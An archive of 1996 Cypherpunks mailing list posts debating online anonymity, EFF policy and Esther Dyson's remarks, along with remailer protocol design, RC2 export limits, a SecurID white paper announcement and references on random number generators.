<2.2.16.19960903171629.0b172268@mail.well.com> At 01:22 AM 9/3/96 -0700, James A. Donald wrote: >At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: >> EFF in generally does not issue extremist position >> statements, but is careful to examine the risks as well as the benefits, >> and look for pro-liberty solutions to those risks. > >If the right to speak anonymously is an "extremist" position in the eyes >of the EFF, then they are no friends of liberty. > >It is hardly an "extremist" position outside of such countries as Cuba, >Iran, or China. > >It is the overwhelmingly mainstream position, not just among netizens, >but when last heard, amongst supreme court judges and ordinary people >in the street. Not necessarily. The character of the anonymous speech is decisive. If you use anonymity to cloak harassment, for instance, the anonymity (which removes accountability) is a problem. The accountability issue is real and should be addressed, not evaded. -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From dlv at bwalk.dm.com Tue Sep 3 19:59:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 10:59:22 +0800 Subject: The Esther Dyson Flap In-Reply-To: <199609031719.KAA03089@mail.pacifier.com> Message-ID: jim bell writes: > At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: > >Esther Dyson says that anonymity on the Net can do more damage than > >anonymity in other forums, and thus may need to be regulated and restricted > >in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's > >term) has grown up with anonymity, and few people take the anonymous (or > >not) rants and charges made in the millions per day with the same degree of > >certainty they take print comments. Put another way, there is no clear and > >present danger. > > Indeed, I support the elimination of concepts such as "slander" and "libel" > precisely because they cause more harm than good. Currently, there is an > illusion among ordinary citizens that "if that was untrue, you could sue him > for libel!" despite the fact that this is rarely practical. In that way, > the law actually adds credibility to what should be an incredible claim. > Eliminate libel suits, and you've eliminated any presumption that because > it's been spoken or is in print, it's likely to be correct. The gubment has no right to fuck with any speech - (seditius) libel, child porn, bomb-making instructions... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From stewarts at ix.netcom.com Tue Sep 3 20:02:13 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 11:02:13 +0800 Subject: Secure anonymouse server protocol: comments please Message-ID: <9609032156.AA05838@anchor.ho.att.com> At 07:24 PM 9/2/96 +0000, paul at fatmans.demon.co.uk wrote: >The following is a very sketchy plan for a secure protocol for an >anonymous server which allows replies without storing a recipient >database in the clear. Several people have talked about this sort of thing recently, inluding William Geiger, Doug Floyd, and myself. Lutz Donnerhacke's Jenaer Anonymous Service actually implements it (send it mail saying "help".) Rather than using a human-selected userid, it uses the PGP keyid to make IDs like anon-1a2b3c4d at as-node.jena.thur.de. >This system has 1 huge fault, we can encrypt a uses ID with the >servers public key to see what his ID in the encrypted database is >and therefore identify him, maybe we need two seperate server public >keys, and when IDs come in encrypted with key1 (the one it releases) >it decrypts with secretkey1 then encrypts with publickey2 (the one it >keeps secret) If you encrypt the id using raw RSA and constant padding, this is a risk. If you encrypt it using PGP, which uses a random session key, it's not. If you encrypt it using raw RSA and pad the id with a random nonce, it's also no risk. In the latter two cases, the encrypted material is different every time, so you can't compare with previous messages. The Jenaer nymserver avoids this by using a remailer approach - you send an encrypted message with a Reply-To: header telling where to send the accumulated mail (which may, of course, be another nymserver), and it delivers it using mixmaster. This frees you to send your pickup requests by anonymous remailer as well. It's still not risk-free, since if Bad Guys crack the remailer or force the operator to operate it while they monitor it, they can see pickup requests, but it's far more difficult to do that than to just steal the box, and there's no database on the box that's useful to steal. Lutz does recommend chaining your Reply-To: to another nymserver, but it's already very secure. I don't remember if he gets fancy and requires the pickup requests to be signed by the key of the owner or not; the only difficulty with this is the syntax of PGP, which is "fixed in 3.0". Hal Finney has also suggested a system that, instead of delivering anonymous email to the recipient, sends a message saying "You have anonymous mail, receipt #123456. Send back this ticket to pick it up." and you can extend the syntax to handle automatic blocking requests and automatic deliver-everything requests. This is fairly easy to extend for anonymous mailboxes and datahaven code. I've wavered between the delete-on-retrieval model, which is fine for email and not very useful for samizdat, or the delete-after-some-time-period-or-request model, which is useful for both but makes it easy for users to turn you into the local pirate-warez-and-child-pornography server. If you extend the model and charge digicash for storage, it becomes a much cleaner solution. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rwright at adnetsol.com Tue Sep 3 20:06:27 1996 From: rwright at adnetsol.com (Ross Wright) Date: Wed, 4 Sep 1996 11:06:27 +0800 Subject: their is a new mailing list Message-ID: <199609032335.QAA09136@adnetsol.adnetsol.com> > To: cypherpunks at toad.com > From: hack5 at juno.com (patrick b cummings) > Date: Tue, 03 Sep 1996 16:14:40 EDT > their is a new mailing list for all you hackers just email your name or > handle and e-mail address and youll be subscribed > send information to hack5 at juno.com > > Am I missing something here? Is this guy fucking crazy? =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From nobody at replay.com Tue Sep 3 20:08:13 1996 From: nobody at replay.com (Anonymous) Date: Wed, 4 Sep 1996 11:08:13 +0800 Subject: No Subject Message-ID: <199609032354.BAA29220@basement.replay.com> patrick b cummings wrote: > their is a new mailing list for all you > hackers > just email your name or handle and e-mail address and youll be subscribed > send information to hack5 at juno.com k00l d00de.... c'mon Varney, we know its you. From Ben at explorateur.quaternet.fr Tue Sep 3 20:21:51 1996 From: Ben at explorateur.quaternet.fr (Ben at explorateur.quaternet.fr) Date: Wed, 4 Sep 1996 11:21:51 +0800 Subject: No Subject Message-ID: <199609040016.BAA10030@explorateur.quaternet.fr> suscribe me From mech at eff.org Tue Sep 3 20:36:05 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:36:05 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031557.IAA28466@dns1.noc.best.net> Message-ID: <199609032202.PAA29704@eff.org> > But we do not want legislation, so we do not want to help write legislation. > > We want to delay legislation for as long as possible, for the longer the > delay, the more the balance of power favors the net and disavors the pols. > > Therefore the correct strategy is simply to attack any politician who shows > any interest in legislating on our issues. > > We have no friends on Capitol hill, and if we did have friends, it would > still be necessary to denounce them as enemies. I agree with the general sentiment behind this, but I think it may go a bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE (the two crypto bills now floating around in Congress). On the surface they both appear to threaten the viability of the Bernstein, Karn and Junger cases, but in reality neither of these bills have a chance in hell of passage. "What's the point then?", you may ask. They slow down the Administration, which is pushing *very* hard and fast to get GAK adopted internationally, and to get US software companies to knuckle in to GAK in exchange for slightly relaxed export controls. Make a lot of noise about the bills, and you screw up the administration's plans, since they have to divert at least some energy to fending the bills off or they *will* pass. You do that, but keep the legal staff working solely on the cases, and you have more breathing room to get the cases through the Supreme Court before it's too late. And, in the event you lose the cases, you still have slightly less than a chance in hell of getting one of the bills passed and salvaging *something*, or simultaneously or alternately, just deploying more crypto tech such as S/WAN (which EFF is committed to as of the most recent board meething), since the Adminstration has been slowed down. The more tech deployment you have, the more irrelevant the Administration's noises are. The point being: Don't let disgust of a process or thing deter you from milking that process or thing of all it is worth, provided you sacrifice nothing significant in the process. It has to be a judgement call. On some other issues this tactic does not work. Any legislation about porn on the Net needs to be slammed down, because any such legislation will get gutted by theocrats and turned into a censorship bill, as an example. Choose action based on careful thinking, not kneejerk reaction, that's my motto, for what it may be worth. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From declan at eff.org Tue Sep 3 20:41:40 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 4 Sep 1996 11:41:40 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031737.KAA20451@netcom2.netcom.com> Message-ID: V.Z. Nuri, please watch your attributions. I don't recall making any claims about "ghettoization" of anonymity. -Declan On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote: > what cpunks might consider doing is creating an alternative message > distribution system like Usenet that starts from the premise that > anonymous communication is allowed and trying to grow it. > > btw, McCullagh's and other's claims about "ghettoization" of > anonymity strike me as very specious. as long as people can use > anonymity in some forum they want, I think that's acceptable. what's > the equivalent of a "ghetto" in cyberspace? you can't go into > a meeting of professionals wearing a ski mask, although you might > be able to create such a forum yourself. does that mean you are > in some kind of a "ghetto"? oh, brother. // declan at eff.org // I do not represent the EFF // declan at well.com // From mech at eff.org Tue Sep 3 20:45:09 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:45:09 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609040057.RAA01205@mail.pacifier.com> Message-ID: <199609040104.SAA06261@eff.org> > >The accountability issue is real and > >should be addressed, not evaded. > > "Addressed", maybe, but that doesn't necessarily mean, "solved." For many > decades, people have been able to walk up to a pay telephone at 3:00 AM and > make a harassing phone call to somebody, a "problem" which still exists and > no solution is being implemented for. Yes! Exactly! Of course! Precisely the example that has come up in EFF's own statements on anonymity (which, in absence of a policy on the topic have been strictly factual, reporting both sides of the issue). > I think it's reasonable to come to the conclusion that there is no solution > to the anonymity "problem" that isn't worse than the underlying anonymity. That's a common view here, to say the least. And it's one with which I am in 100% agreement. > And, BTW, I don't consider a pro-anonymity position to be an extremist one. We don't either, even those of us with questions and conundrums to think about. I do think its extremist to not be willing to even address the questions and conundrums, but we're in agrement on that, so not much to argue about, fortunately. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From winsock at c2.net Tue Sep 3 20:45:10 1996 From: winsock at c2.net (WinSock Remailer) Date: Wed, 4 Sep 1996 11:45:10 +0800 Subject: Pseudocrypto detector is going wild Message-ID: <199609040024.RAA14142@infinity.c2.org> Is it just me, or is the snake-oil frequency factor scaling up? We used to get this stuff quarterly, and now it's monthly, if not weekly! slither-squeek I think enquirer must be overloaded with ammo, and I am sure in the mood for it now. me From peiterz at secnet.com Tue Sep 3 20:46:36 1996 From: peiterz at secnet.com (Peiter Z) Date: Wed, 4 Sep 1996 11:46:36 +0800 Subject: SecurID White Paper Message-ID: <199609041738.LAA01411@silence.secnet.com> SecurID Vulnerabilities White-Paper Due to increased recent interest that has been witnessed on the net about the SecurID token cards and potential vulnerabilities with their use, we offer a white paper on some of the vulnerabilities that we believe have been witnessed and/or speculated upon. This paper is being put forth into the public domain by Secure Networks Incorporated and is available at the following URL : ftp://ftp.secnet.com/pub/papers/securid.ps Topics dealt with in the paper include: . Race attacks based upon fixed length responses (still valid even with the current patch) . Denial of Service attacks based upon server patches . Server - Slave separation and replay attacks . Vulnerabilities in the communications with the ACE Server . A quick analysis of the communications with the ACE Server . Problems with out-of-band authentication We hope this paper provides insight, enlightenment, and is helpful to the security community in general. thanks and enjoy, Secure Networks Inc. From jimbell at pacifier.com Tue Sep 3 20:54:31 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 11:54:31 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609040057.RAA01205@mail.pacifier.com> At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >At 01:22 AM 9/3/96 -0700, James A. Donald wrote: >>At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: >>> EFF in generally does not issue extremist position >>> statements, but is careful to examine the risks as well as the benefits, >>> and look for pro-liberty solutions to those risks. >> >>If the right to speak anonymously is an "extremist" position in the eyes >>of the EFF, then they are no friends of liberty. >> >>It is hardly an "extremist" position outside of such countries as Cuba, >>Iran, or China. >> >>It is the overwhelmingly mainstream position, not just among netizens, >>but when last heard, amongst supreme court judges and ordinary people >>in the street. > >Not necessarily. The character of the anonymous speech is decisive. If you >use anonymity to cloak harassment, for instance, the anonymity (which >removes accountability) is a problem. The accountability issue is real and >should be addressed, not evaded. "Addressed", maybe, but that doesn't necessarily mean, "solved." For many decades, people have been able to walk up to a pay telephone at 3:00 AM and make a harassing phone call to somebody, a "problem" which still exists and no solution is being implemented for. I think it's reasonable to come to the conclusion that there is no solution to the anonymity "problem" that isn't worse than the underlying anonymity. And, BTW, I don't consider a pro-anonymity position to be an extremist one. Jim Bell jimbell at pacifier.com From mech at eff.org Tue Sep 3 20:56:11 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:56:11 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.16.19960903152037.58cfc590@mail.well.com> Message-ID: <199609040019.RAA04643@eff.org> > Compromise is not necessarily a bad thing; without some give and take, we > sorta run right over each other. OTOH, I do agree that a strong position is > necessary at this juncture. Certainly. EFF regularly compromises with our allies, e.g. on who will run a particular web page, what a campaign icon will look like, where an event will be held, etc. We're just not in the habit of compromising on legislation, since we are not in a position to give or sell anything, particular the rights of the public and of individual citizens. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From ddfr at best.com Tue Sep 3 21:03:26 1996 From: ddfr at best.com (david friedman) Date: Wed, 4 Sep 1996 12:03:26 +0800 Subject: Schelling Points, Rights, and Game Theory--My article Message-ID: Tim May mentioned my article on this subject. It is: "A Positive Account of Property Rights," Social Philosophy and Policy 11 No. 2 (Summer 1994) pp. 1-16. It can be found from the academic part of my web page: http://www.best.com/~ddfr/Academic/Academic.html David Friedman From mech at eff.org Tue Sep 3 21:33:13 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 12:33:13 +0800 Subject: EDyson CPF 95 item Message-ID: <199609040140.SAA07236@eff.org> If anyone does did that up, please bounce one my way, so I can add it to the archives. Any other good stuff from that CFP would be of value too. Ditto for CFP96. I think the newest CFP transcripts we have are 94. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From drose at AZStarNet.com Tue Sep 3 22:07:14 1996 From: drose at AZStarNet.com (David M. Rose) Date: Wed, 4 Sep 1996 13:07:14 +0800 Subject: Voting Monarchist? Message-ID: <199609032306.QAA26604@web.azstarnet.com> Dimitri, err, Dr. Vulis, or is that Dr. Nuri?, Relax! The modern cure for hydrophobia is a great deal less painful than what it was in the past >Harry Brone is a fucking statist. If he weren't, he wouldn't be running >for president. Anyone who doesn't advocate killing all kings, presidents, >and prime ministers is a fucking statist and should be beaten to a pulp >with a rattan stick. From ichudov at algebra.com Tue Sep 3 22:10:31 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Wed, 4 Sep 1996 13:10:31 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) In-Reply-To: Message-ID: <199609032225.RAA07933@manifold.algebra.com> Timothy C. May wrote: > At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote: > >:: > >Request-Remailing-To: remailer at huge.cajones.com > >:: > >Request-Remailing-To: remailer at remailer.nl.com > .... > >:: > >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod) > >Deep Throat. > > > Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines! > At least now we know who the _other_ "Unicorn" is. Which brings up the following question: what is the role of human screwups in cryptosecurity? How "foolproof" (no pun intended) should be remailer clients? How can we prevent people from forgetting to delete unencrypted files after encryption? Alternatively, let's think about this: premail always fingers a certain user account at berkeley.edu to obtain remailer keys. Suppose that Joe DrugUser uses remailers to talk to his Columbian friends and the government wants to find out what he is doing. They could just break into the computer at berkeley.edu and replace keys with the government-provided keys. They could even modify the finger server so that it would be lying only to Joe's computer and would work just as before for all others (to prevent detection). The government would then intercept Joe's communications and decrypt them. - Igor. From stewarts at ix.netcom.com Tue Sep 3 22:27:56 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 13:27:56 +0800 Subject: rc2 export limits.. Message-ID: <199609040252.TAA11495@toad.com> At 10:33 AM 9/3/96 -0700, you wrote: >Hi, Does anyone know the export limit for RC2 Key size ? As with any other crypto system, the rule is "you need to get the NSA's permission, which they'll give if they feel like", rather than any well-defined rule you can depend on. However, the usual guidelines for systems like RC2 and RC4 is 40-bit keys, and RSA keys up to 512 bits for encrypting session keys and 1024 bits for signatures, plus you have to structure the code so people can't easily modify it or use it to triple-encrypt in ways that make the triple-encrypted version stronger than 40 bits. Also, if you're using Real RC2, you may need permission from RSA Data Systems, Inc.. If you're just using the algorithm that came out on the net that looks suspiciously like RC2, you may or may not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Tue Sep 3 22:35:40 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 13:35:40 +0800 Subject: What is the EFF doing exactly? Message-ID: At 1:56 AM 9/4/96, jim bell wrote: >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>Not necessarily. The character of the anonymous speech is decisive. If you >>use anonymity to cloak harassment, for instance, the anonymity (which >>removes accountability) is a problem. The accountability issue is real and >>should be addressed, not evaded. > >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many >decades, people have been able to walk up to a pay telephone at 3:00 AM and >make a harassing phone call to somebody, a "problem" which still exists and >no solution is being implemented for. > >I think it's reasonable to come to the conclusion that there is no solution >to the anonymity "problem" that isn't worse than the underlying anonymity. >And, BTW, I don't consider a pro-anonymity position to be an extremist one. I agree, of course. There is absolutely nothing about "speech" that is tied to "accountability." And various Supreme Court decisions have emphasized this. (Pay special attention to the quote from Greg Broiles I included in my section from my Cyphernomicon I just posted to the list.) Think about it. Anyone may say pretty much anything they wish (modulo the usual exceptions of certain forms of obscenity, shouting "Fire!," etc....and even these are enforced ex post facto). Once a speech act occurs and some criminal prosecution results, the cops can try to catch the speaker. But if they can't, they can't. We don't require that speech only be done in a way that illegal speakers may be held "accountable." The fact that certain classes of speakers are indeed held accountable is more a function of the particular details of the way they spoke and the nature of society than it is that there is a rule that "all speech must involve accountability." We hold the author of an article in "The Washington Post" more liable for insulting speech than we do the guy in the neighborhood gym, even if they both say the same words. The issue is clearly not that "all speech must involve accountability," as many forms of speech are not. (I'd say the meta-issue is "You can drag someone into court if you can catch them. But if you can't catch them, you can't. And we're not going to limit speech just to make it easier to catch speakers you may wish to haul into court.") As Jim and so many others have noted, anonymous phone calls, anonymous postal mail, whispering campaigns, speech in private homes, etc., are all examples where accountability is extremely difficult or impossible to enforce. We even have names for these things: anonymous threats, poison pen letters, ransom demands, gossip, etc. Saying that speech on the Net may need to be restricted so as to ensure "accountability" is a serious step in the direction of requiring credentialling of all speakers, key escrow, and limits on remailers. Given that so many other types of speech are given anonymity protection, why? The reason this is such a hot button for Cypherpunks is that "responsible freedom" and "accountability" are often code words for controlling some very basic freedoms. Placing limits on anonymous speech would involve some very fundamental restrictions on freedoms of various sorts. Even if "safeguards" are built-in, the effect would almost certainly be to illegalize remailers (unless they had "escrow" features!). And a wide array of other freedoms, too numerous for me to write about here. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Tue Sep 3 22:46:48 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 13:46:48 +0800 Subject: Anonymity (re: the Esther Dyson issue) Message-ID: The latest debate about "anonymity" and its hazards is bringing up charges that we Cypherpunks are not taking Esther Dysomn's concerns seriously enough. I strongly disagree. The various downsides of anonymity, pseudonymity/pseudoanonymity, lack of accountability, etc., have been hashed out in literally *thousands* of posts over the past four years! Many of us have written long articles dealing with these issues, and referring in great detail to mechanisms for dealing with "obnoxious speech," "defamatory speech," "anonymous mailbombs," "anonymous threats," etc. Rather than dredge up my own articles, or those of the many others who have addressed most or all of the concerns most often raised, I'll post here one of the subsections from my Cyphernomicon. This is just one of the subsections in the entire _chapter_ devoted to issues of anonymity, mixes, and remailers. (For those not familiar with the style of my Cyphernomicon, I used a powerful outline processor (MORE) to build a skeleton, attach threads and ideas, move things around, clone headings in more than one place, etc. For a large writing project of this sort, an outline processor is almost a necessity. At least for me. The points are often short and are sometimes incomplete; fleshing the whole thing out into well-written expository prose would've taken an additional several months of full-time effort. This form gets the points across.) (A few subsubsections are deleted, to save space.) Cyphernomicon 8.3 Anonymity, Digital Mixes, and Remailers: Anonymity and Digital Pseudonyms 8.3.1. Why is anonymity so important? - It allows escape from past, an often-essential element of straighening out (an important function of the Western frontier, the French Foreign Legion, etc., and something we are losing as the dossiers travel with us wherever we go) - It allows new and diverse types of opinions, as noted below - More basically, anonymity is important because identity is not as important as has been made out in our dossier society. To wit, if Alice wishes to remain anonymous or pseudonymous to Bob, Bob cannot "demand" that she provide here "real" name. It's a matter of negotiation between them. (Identity is not free...it is a credential like any other and cannot be demanded, only negotiated.) - Voting, reading habits, personal behavior...all are examples where privacy (= anonymity, effectively) are critical. The next section gives a long list of reasons for anonymity. 8.3.2. What's the difference between anonymity and pseudonymity? + Not much, at one level...we often use the term "digital pseudonym" in a strong sense, in which the actual identity cannot be deduced easily - this is "anonymity" in a certain sense - But at another level, a pseudonym carries reputations, credentials, etc., and is _not_ "anonymous" - people use pseudonyms sometimes for whimsical reasons (e.g., "From spaceman.spiff at calvin.hobbes.org Sep 6, 94 06:10:30"), sometimes to keep different mailing lists separate (different personnas for different groups), etc. 8.3.3. Downsides of anonymity - libel and other similar dangers to reputations + hit-and-runs actions (mostly on the Net) + on the other hand, such rantings can be ignored (KILL file) - positive reputations - accountability based on physical threats and tracking is lost + Practical issue. On the Cypherpunks list, I often take "anonymous" messages less seriously. - They're often more bizarre and inflammatory than ordinary posts, perhaps for good reason, and they're certainly harder to take seriously and respond to. This is to be expected. (I should note that some pseudonyms, such as Black Unicorn and Pr0duct Cypher, have established reputable digital personnas and are well worth replying to.) - repudiation of debts and obligations + infantile flames and run-amok postings - racism, sexism, etc. - like "Rumormonger" at Apple? - but these are reasons for pseudonym to be used, where the reputation of a pseudonym is important + Crimes...murders, bribery, etc. - These are dealt with in more detail in the section on crypto anarchy, as this is a major concern (anonymous markets for such services) 8.3.4. "How will privacy and anonymity be attacked?" - the downsides just listed are often cited as a reason we can't have "anonymity" - like so many other "computer hacker" items, as a tool for the "Four Horsemen": drug-dealers, money-launderers, terrorists, and pedophiles. - as a haven for illegal practices, e.g., espionage, weapons trading, illegal markets, etc. + tax evasion ("We can't tax it if we can't see it.") - same system that makes the IRS a "silent partner" in business transactions and that gives the IRS access to-- and requires--business records + "discrimination" - that it enables discrimination (this _used_ to be OK) - exclusionary communities, old boy networks 8.3.5. "How will random accusations and wild rumors be controlled in anonymous forums?" - First off, random accusations and hearsay statements are the norm in modern life; gossip, tabloids, rumors, etc. We don't worry obsessively about what to do to stop all such hearsay and even false comments. (A disturbing trend has been the tendency to sue, or threaten suits. And increasingly the attitude is that one can express _opinions_, but not make statements "unless they can be proved." That's not what free speech is all about!) - Second, reputations matter. We base our trust in statements on a variety of things, including: past history, what others say about veracity, external facts in our possession, and motives. 8.3.6. "What are the legal views on anonymity?" + Reports that Supreme Court struck down a Southern law requiring pamphlet distributors to identify themselves. 9I don't have a cite on this.) - However, Greg Broiles provided this quote, from _Talley v. State of California_, 362 U.S. 60, 64-65, 80 S.Ct. 536, 538-539 (1960) : "Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all." Greg adds: "It later says "Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes." [Greg Broiles, 1994-04-12] + And certainly many writers, journalists, and others use pseudonyms, and have faced no legal action. - Provided they don't use it to evade taxes, evade legal judgments, commit fraud, etc. - I have heard (no cites) that "going masked for the purpose of going masked" is illegal in many jurisdictions. Hard to believe, as many other disguises are just as effective and are presumably not outlawed (wigs, mustaches, makeup, etc.). I assume the law has to do with people wearning ski masks and such in "inappropriate" places. Bad law, if real. 8.3.7. Some Other Uses for Anonymous Systems: + Groupware and Anonymous Brainstorming and Voting - systems based on Lotus Notes and designed to encourage wild ideas, comments from the shy or overly polite, etc. - these systems could initially start in meeting and then be extended to remote sites, and eventually to nationwide and international forums - the NSA may have a heart attack over these trends... + "Democracy Wall" for encrypted messages - possibly using time-delayed keys (where even the public key, for reading the plaintext, is not distributed for some time) - under the cover of an electronic newspaper, with all of the constitutional protections that entails: letters to the editor can be anonymous, ads need not be screened for validity, advertising claims are not the responsibility of the paper, etc. + Anonymous reviews and hypertext (for new types of journals) + the advantages - honesty - increased "temperature" of discourse + disadvantages - increased flames - intentional misinformation + Store-and-forward nodes - used to facillitate the anonymous voting and anonymous inquiry (or reading) systems - Chaum's "mix" + telephone forwarding systems, using digital money to pay for the service - and TRMs? ... We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From declan at well.com Tue Sep 3 22:48:11 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 13:48:11 +0800 Subject: Save the Howitzers (was Re: The Esther Dyson Flap) Message-ID: TCM wrote: >And please spare us the "save the howitzers" comment. We talk about what >concerns us. As it happens, our political opponents don't read our words, >whereas a bunch of EFF board members apparently do, and so our criticisms >here may cause EFF to actually confront the issue of anonymity and decide >where they actually stand. I think Tim's comments are generally on-point. EFF board members are paying attention to discussions on the cypherpunks list and the organization would appear to be moving in a direction that will result in a solid pro-anonymity policy. For reference, EPIC's position is: "Our position is that we strongly support anonymity both for speech and for transactions. The right to anonymous speech is a constitutionally protected right (Tally v. California, McIntrye v Ohio) and we believe that it equally applies in cyberspace. Anonymous transactions are a key way (and perhaps the only way that really works) to provide privacy on the net." CDT's current position is: "CDT believes that anonymous political speech is protected under the first amendment and would oppose any effort to restrict or curtail it on the Net." -Declan From jamesd at echeque.com Tue Sep 3 22:52:22 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 13:52:22 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609040334.UAA19232@dns1.noc.best.net> At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: > Not necessarily. The character of the anonymous speech is decisive. If you > use anonymity to cloak harassment, for instance, the anonymity (which > removes accountability) is a problem. The accountability issue is real and > should be addressed, not evaded. No: The harassment is the problem, not the anonymity that makes it possible. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From mpd at netcom.com Tue Sep 3 22:53:21 1996 From: mpd at netcom.com (Mike Duvos) Date: Wed, 4 Sep 1996 13:53:21 +0800 Subject: The Esther Dyson Flap In-Reply-To: Message-ID: <199609040316.UAA27856@netcom16.netcom.com> Timothy C. May writes: > Indeed, I support the elimination of concepts such as > "slander" and "libel" precisely because they cause more harm > than good. Currently, there is an illusion among ordinary > citizens that "if that was untrue, you could sue him for > libel!" despite the fact that this is rarely practical. In > that way, the law actually adds credibility to what should > be an incredible claim. Eliminate libel suits, and you've > eliminated any presumption that because it's been spoken or > is in print, it's likely to be correct. Reputation performs this function very well, and without expensive litigation. That is why there is really no clear and present danger posed by inacurate information on the Net. Governments shield themselves far better by promoting conspiracy theory as a recreational activity than they ever could by prosecuting people who expose their activities. Drowning signal in noise effectively obscures it without lending credence to material one cannot easily debunk. As they say on X-Files, "The Truth is Out There..." (Somewhere) -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From geeman at best.com Tue Sep 3 22:53:23 1996 From: geeman at best.com (geeman at best.com) Date: Wed, 4 Sep 1996 13:53:23 +0800 Subject: Is Knuth's _AoCP_ still the authority on PRNG? Message-ID: <01BB99D9.9A115240@geeman.vip.best.com> check out "On the Efficient Generation of Cryptographic Confusion and Diffusion Sequences" I may have gotten the title less than perfect. AltaVista will find it for you if you try. Excellent piece. ---------- From: eli+ at gs160.sp.cs.cmu.edu[SMTP:eli+ at gs160.sp.cs.cmu.edu] Sent: Tuesday, September 03, 1996 7:54 PM To: coderpunks at toad.com Subject: Re: Is Knuth's _AoCP_ still the authority on PRNG? Bryce writes: >I'm reading Knuth chapter 3 on "random numbers". Have there >been any major advances since the publication of the second >edition of _The Art of Computer Programming, Volume 2_ in 1981? A much-referenced article: Marsaglia, G. (1985). "A current view of random number generation". In L. Billard (ed.), _Computer Science and Statistics: The Interface_. A more recent survey, which I haven't read: L'Ecuyer, P. (1990). "Random numbers for simulation". CACM 87, no. 10, 85-97. I read the resulting _NYT_ blurb, but not the paper: Ferrenberg et al. (1992). "Monte Carlo simulations: Hidden errors from `good' random number generators". Phys. Rev. Lett. 69, 3382-4. This is from the "simulation" angle, which is where Knuth is coming from. For crypto you may be interested in the complexity-theoretic approach (things like Blum-Blum-Shub), which is a whole different field. >Are any of the ideas advocated in chapter 3 now considered >inadvisable? I think the Marsaglia paper sank Knuth's recommended generator. "Sank" is a relative term, of course. -- Eli Brandt eli+ at cs.cmu.edu From jonl at well.com Tue Sep 3 22:56:43 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 13:56:43 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904032356.006dd760@mail.well.com> At 05:56 PM 9/3/96 -0800, jim bell wrote: >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many >decades, people have been able to walk up to a pay telephone at 3:00 AM and >make a harassing phone call to somebody, a "problem" which still exists and >no solution is being implemented for. > >I think it's 